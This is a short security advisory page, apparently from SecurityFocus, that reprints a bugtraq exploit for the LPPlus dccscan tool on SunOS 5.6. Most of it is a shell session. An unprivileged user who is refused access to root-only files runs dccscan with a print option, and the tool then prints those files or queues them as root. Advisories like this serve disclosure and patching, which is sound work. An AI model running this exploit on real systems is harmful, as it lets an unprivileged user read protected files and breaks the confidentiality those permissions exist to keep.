LPPlus dccscan unprivileged read vulnerability

The following exploit was excerpted verbatim from the original bugtraq post:

# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$

# now, go to the printer and wait for the files to come out, or watch them
# being queued as root, if you have access to dccstat


 

Privacy Statement
Copyright 2010, SecurityFocus